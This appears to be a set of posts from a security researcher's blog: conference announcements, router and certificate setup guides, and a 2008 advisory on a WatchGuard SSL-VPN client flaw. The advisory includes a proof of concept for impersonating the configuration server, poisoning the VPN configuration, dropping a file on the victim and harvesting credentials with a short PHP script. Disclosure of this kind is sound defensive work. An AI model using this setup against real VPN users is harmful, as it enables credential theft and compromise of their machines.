2009 was the first edition of BruCON, a non-profit conference meant to unite all the people in and around Belgium interested in discussing computer security, privacy and computer technology related topics. It was a great first edition thanks to the help of the sponsors and many volunteers.

I'm happy that I'll be able to play a (more significant) role in the organization of the second edition.

Do you have an interesting topic to present or a cool workshop? Have a look at the Call of Papers here.

In just a week the long awaited conference HAR is taking place. Time to have a little overview:

• Tickets are unfortunately not available anymore, don't even bother coming to the event without ticket as door-sales won't be done. Next time, try to plan your holiday a little earlier.
• If you arrive early and want to help build up simply create your wiki-profile page based on the volunteer-template. Your arrival date will automagically appear in the volunteers page. Helping a hand is a great way to have fun and meet very interesting people.
• Like always we Belgians group together. This year Belhack (belsec people and the former Iguana colony) and Hacker Space Brussels join the forces. If you don't like a calm place you can join the Belgian Embassy that has a more noisy reputation.
• Print out your ticket, don't forget your tent, prep and harden your computer and phone, stop worrying, and prepare yourself to enjoy your stay.

Oh, last but not least: You will probably see many BruCON people. Did you already book that ticket?

I talked a few times about this issue, but unfortunately I didn't get a response to my CVE number request. So here's the full thing:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Security Advisory
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: High
     Title: Watchguard Fireware SSL-VPN MiTM Multiple Vulnerabilities
      Date: November 29, 2008
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 * Project: WatchGuard Firewall SSL-VPN
 * Version affected: 
            WatchGuard Fireware 10.0 up to 10.2.2 
            WatchGuard Mobile VPN with SSL 10.0 for Macintosh
            WatchGuard Mobile VPN with SSL 10.0.2 for Macintosh
            WatchGuard Mobile VPN with SSL 10.0 for Windows

 * Discovered:  April 06, 2008
 * Reported  :  April 08, 2008
 * Fixed     :  October 07, 2008  (only for Windows)
 * Advisory  :  November 29, 2008

 * Not Fixed :  Mobile VPN with SSL for Macintosh
 
 * Security risk: High Severity
 * Vulnerability: MiTM Multiple Vulnerabilities with Abritrary Code Execution

 * Discovered by: Christophe Vandeplas <christophe@vandeplas.com>

 
-------- SHORT DESCRIPTION --------
Due to bad design of the 'WatchGuard Mobile VPN with SSL Client'
it is vulnerable to a MiTM attack resulting in multiple consequences:
- Username and password gathering
- OpenVPN configuration poisoning 
- Upload of malware on the victims machine
- Redirection to another VPN server
- Full transparent MiTM for the complete VPN tunnel
- Arbitrary code execution on the victims machine

This vulnerability should be classed as high severity.

-------- REMEDIATION --------

For Windows computers update ASAP your software.
Stop using the software on Macintosh computers until Watchguard
releases a fixed Macintosh version of the client.

-------- FULL DESCRIPTION --------

-- [ How the Watchguard Fireware SSL-VPN Works

The Watchguard SSL-VPN system consists of four parts:
- OpenVPN Client
- WatchGuard Mobile VPN with SSL GUI Client (or Watchguard GUI Client)
- OpenVPN Server
- Webserver where the client-configuration resides (port 4100)

The OpenVPN Client and Server take care of the full VPN tunnel. As 
authentication the 'auth-user-pass', 'server-certificate' and 
'client-cert' mechanisms are used. These are good security practices.
The Watchguard GUI takes care of two different tasks. It takes care
as management interface for entering the OpenVPN credentials and it
downloads the client configuration from the webserver on port 4100.
The webserver for the client-configuration runs on port 4100 and 
uses SSL for encryption. The certificate is self signed.

-- [ The Flow:

The Watchguard GUI Client needs the Firebox IP, username and 
password. When the user clicks on 'connect' the GUI Client connects 
on the webserver on ip:4100 using SSL encryption where it downloads
the 'client.wgssl' file with the following HTTP GET:
GET /?action=sslvpn_download&username=testuser&password=testpass&filename=client.wgssl
A file called 'client.wgssl' is then downloaded on the machine.
This file is a TGZ and contains the following files:
MD5SUM      - Checksums of the different files from the wgssl package
VERSION     - File with version info from Watchguard
ca.crt      - Certificate authority public key
client.crt  - Client public key
client.ovpn - OpenVPN configuration file
client.pem  - Private key for the client

The Watchguard GUI Client extracts the files and then starts up
OpenVPN with this configuration.
OpenVPN then takes care of setting up the VPN tunnel. When the 
username and password are required it communicates with the 
Watchguard GUI Client using the OpenVPN management interface.
The VPN tunnel is started.

-- [ The problem:

The problem resides in the way GUI Client downloads the configuration. 
The webserver:4100 works with a self-signed certificate. The 
validity of this certificate is never checked correctly.
The Client GUI does check the strings in the following fields:
Common Name (CN)         = Fireware Web Server
Organization (O)         = Watchguard
Organizational Unit (OU) = Fireware

These checks are insufficient. A full certificate check should be 
performed using either the manually imported certificate before 
connection or using an imported CA-cert. 

This results in:
1) Anyone can generate a certificate with these values. An attacker 
   could run a webserver and impersonate the original SSL-VPN server.
2) The password is stored in clear-text in the GET method. 
3) The checks on the content of the client.wgssl are almost nihil. 
   It is possible to completely replace the existing client 
   configuration and to add extra files in the configuration 
   directory of the client machine.
4) It is possible to redirect the client to another VPN server. As 
   we have complete control the full VPN tunnel could be MiTM-ed 
   without the user noticing this.
5) Combined with the 'up cmd' option of the OpenVPN configuration file 
   arbitrary code could be executed on the victims machine.


-------- PROOF OF CONCEPT --------

--[ Main Setup

Take an original 'client.wgssl' file, rename it to 'client.wgssl.tgz'
and extract it.
  Change the 'remote' value to another IP (1.1.1.1) in the
  'client.ovpn' file and recalculate the checksum. 
  Copy a 'malware.exe' in the same diractory. (this could be 
  childporn or a virus)
  Compress all files again in a new .tgz package with the right 
  filename.

An Apache webserver has been configured to run on port 4100 using 
the SSLEngine. 
The SSL certificate was generated with the following values:
  Common Name (CN)         = Fireware Web Server  
  Organization (O)         = Watchguard
  Organizational Unit (OU) = Fireware
In the webroot of the webserver we uploaded a small script that 
saves the parametes into a database and returns a client.wgssl file 
as datastream.

-- [ Connect

Now open the Watchguard GUI Client and connect to the IP of the 
webserver. (192.168.1.110)
The Client downloads the new 'client.wgssl' file and extracts it.

-- [ Results:

1) The Watchguard GUI accepts the fake certificate 
2) When checking the logfile we see a successful download of 
   the configuration file: 
   192.168.1.120 - - [08/Apr/2008:19:06:14 +0200] "GET /?action=sslvpn_download&username=testuser&password=testpass&filename=client.wgssl HTTP/1.1" 200 12 "-" "-"
   These usernames and passwords could be stored in a database using 
   a php script. (see PHP Sample Script)

3a) The client configuration is completely rewritten with our own 
    configuration file.
3b) Check the Watchguard GUI Client directory for the 'malware.exe'
    file.

4a) Check the logging, you will notice that the client doesn't 
    connect to 192.168.1.110 but to 1.1.1.1
4b) Out of scope of this POC
5) Out of scope of this POC

-------- Technical SOLUTIONS for Watchguard --------

The WatchGuard Mobile VPN with SSL Client should correctly check the
validity of the SSL Certificate using the well-defined standards when 
connecting to the configuration-website on port 4100.

The Watchguard firewall should enable the user to generate and upload 
certificates and to link these certificates to the webservers. 
An even better solution would be to run both OpenVPN and the 
configuration-website on the same port and use the same certificates. 
OpenVPN starting from version 2.1 supports a feature called 
port-sharing where OpenVPN can share a port with a webserver or 
other service.


-------- PHP Sample Script --------
<?php 
// Do whatever we want with the variables
$user=$_GET['username']; 
$pass=$_GET['password'];

// Return the client.wgssl configuration file
header("Content-Type: application/octet-stream");
header("content-disposition: attachment; filename=\"client.wgssl\"");
$file=file_get_contents("client.wgssl");
echo $file;
?>


-------- LINKS --------
- Watchguard Release Notes
https://www.watchguard.com/Download/Files/WSM/10_2_3/EN_ReleaseNotes_WSM... 

- OpenVPN 2.1 Manual
http://openvpn.net/index.php/documentation/manuals/openvpn-21.html

Import the CA’s / certificate chain

Place the public key of the Certificate Authority in a file (one file per item in the chain), and import the files with the following command:

[servername]$ keytool -v -import -trustcacerts -keystore keystore \
   -file ../cacert1.txt -alias "ca1"
[servername]$ keytool -v -import -trustcacerts -keystore keystore \
   -file ../cacert2.txt -alias "ca2"

When promted for a password enter : password

Create the private key:

[servername]$  keytool -genkeypair -alias "mykey" -keystore keystore \
   -validity 1825 -keyalg RSA -keysize 2048
Enter keystore password: password  (not shown while typing)
Re-enter new password: password  (not shown while typing)
What is your first and last name?
  [Unknown]:  modseccon.home.vandeplas.com
What is the name of your organizational unit?
  [Unknown]:
What is the name of your organization?
  [Unknown]:  Home
What is the name of your City or Locality?
  [Unknown]:
What is the name of your State or Province?
  [Unknown]:
What is the two-letter country code for this unit?
  [Unknown]:  BE
Is CN=modseccon.home.vandeplas.com, OU=Unknown, O=Home, L=Unknown, ST=Unknown, C=BE correct?
  [no]:  yes
 
Enter key password for <mykey>
     (RETURN if same as keystore password):

Generate a CSR:

The CSR is the Certificate Signing Request that will be send to the Certificate Authority. This authority will need to confirm you are the owner of the domain name specified.

[servername]$ keytool -certreq -v --keystore keystore -alias "mykey"
Enter keystore password: password  (not shown while typing)

Copy paste the CSR (include the ---BEGIN--- and ---END---) in a file and then make sure it's signed by the Certificate Authority. Then wait for the signed certificate.

Import Signed Certificate in keytool:

Copy paste the signed certificate (include the ---BEGIN--- and ---END---) in a file like signedcert.txt.
Then import the thing into the keystore using the following command:

[servername]$ keytool -v -import -trustcacerts -keystore keystore \
   -file ../signedcert.txt -alias "mykey"

(if you get an error about certificate chain, then you didn’t import the CAcertificates correctly

Copy the keystore to the right location:

[servername]$ cp keystore ./templates/com.thinkingstone.console.ConsoleComponent/ssl/keystore
[servername]$ cp keystore ./var/data/main/console/ssl/keystore

Start up ModSecurity Console and enjoy your https website!

BruCON is an annual two-day conference by and for the security and hacker community. The conference offers lectures and workshops on a multitude of topics like computer security, privacy, information technology and its implications on society. It takes place at the Surfhouse in Brussels, Belgium on September 18 and 19.

Tickets should be purchased asap as from the 1^st of July the price raises from €180 to €250. The staff didn't forget students ! Their price is €50 till the 1^st of July.

The presentations on IPv6 security, MPLS hacking, Cyberwarfare, Social engineer techniques, Cloud Computing Security, Open source Information gathering, Dangers of Social networks, and much more, there will be interesting workshops and other events.

Unfortunately I won't be able to go as I'll be in Canada because of a wedding. But count me in for the second edition!

For some time I've been a serious promoter of free internet everywhere. Nobody can deny how practical it is to take your laptop/phone and be able to browse the web without extra UMTS/3G connection.

Being from the principle that you can't get what you don't give I share my internet for a few years. For simplicity and laziness I did it the dirty way: Two wireless SSIDs , WPA2 and unencrypted, connected to the same LAN. My own traffic being fully encrypted from the laptop to the AP, but anonymous people would have full access to my network. It was not something I really liked.

As I just moved in and have brand new internet it was time to configure this correctly.
The plan is the following:

• Create two networks: one private, one public
• The networks should not be able to communicate
• Don't buy extra hardware (aka use only my Linksys)

Change firmware to DD-WRT

I did this a long time ago, but if you didn't do it yet check out the official DD-WRT website for the firmware and manuals.

The two SSIDs

In the Wireless > Basic Settings page click on Add in the Virtual Interfaces section. Your newly created interface will have the name wl0.1. The primary wireless is still called wl0.

Don't forget to configure encryption on your primary wireless in the Wireless > Wireless Security page.

Splitting the private and public network

On the Setup > Networking page create a bridge called br2. Enter the IP address of the router in that network. (this should be a different network than your private net.). Apply Settings.

In the Assign to Bridge section of the same page click on Add and choose br2 then wl0.1. Apply Settings.

Activating a DHCP on the public network

At the bottom of the Wireless > Basic Settings page you can add another DHCP server. Make sure it's connected to the br2 interface.

Firewall changes

We need to add a few rules to our firewall to allow and block traffic.
To make sure this is executed at boot I added the following rules in Administration > Commands of the webinterface.

iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD
iptables -I FORWARD -i br2 -o ppp0 -s 192.168.107.0/24 -j ACCEPT
iptables -I FORWARD -i br0  -j ACCEPT
iptables -I INPUT -i br2 -p udp --dport 67:68 --sport 67:68 -j ACCEPT
iptables -I INPUT -i br2 -p udp --dport 53 -j ACCEPT
iptables -I INPUT -i br0 -j ACCEPT
iptables -I OUTPUT -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -P OUTPUT DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP

Now is the time to test everything. Try to connect to your private network, browse the web. Now join the free-internet SSID and try the same. Try connecting to a host in your private-net, this shouldn't work.
It's not a bad idea to reboot your router once more, just to be certain everything is set correctly the day you have a power outage.

Consequences

There are a few consequences by opening your internet connection to outsiders. Here's an exhaustive incomplete list:

• Limited download: a visitor can download a ton of traffic on your account. Make sure you don't have to low limits. I've never had issues with this.
• Limited speed: someone else can slow down your internet. I've never had issues with this. You could solve this with the QoS features of DD-WRT.
• Illegal behavior: people could use your connection for illegal activities

To protect myself from the illegal activities I plan to set up a portal page using the NoCatSplash feature of DD-WRT. I also plan to log every mac-address that connect to my wireless and the timestamp.

You might have noticed BackTrack 4 Beta is out for a few days. Since it brings some interesting new features I planned to upgrade/reinstall my BT3 USB to the latest edition.

For the Linux users there is a quick install guide that enumerates the different commands needed to setup the system.
Having at that precise moment only a Windows system laying around I had to follow another procedure. The easiest way is the following:

1. First format your partition as FAT32. Windows refuses to format partitions bigger than 30GB in FAT32 (to force users to use NTFS). It's only a GUI limitation so you can still use the CLI to format d: /fs:fat32.
2. Now download Unetbootin. It's a kind of assistant to install ISO's to your USB disk. (Thanks for the tip Security4all)
3. In Unetbootin choose Disk image and specify the path to the BT4b iso file.
4. In the Type I had to choose manual as Unetbootin didn't detect my disk as USB disk.
5. Just press the OK button and wait.

I noticed there was no bootloader installed on the USB disk so I had to to this manually. It's fairly simple:
Browse to the disk located on your computer and execute the d:\boot\bootinst.bat script. The script will try to autodetect the drive letter and will ask a confirmation. Double check it and confirm.

Now boot your system from the USB disk and here it is: BackTrack 4 beta.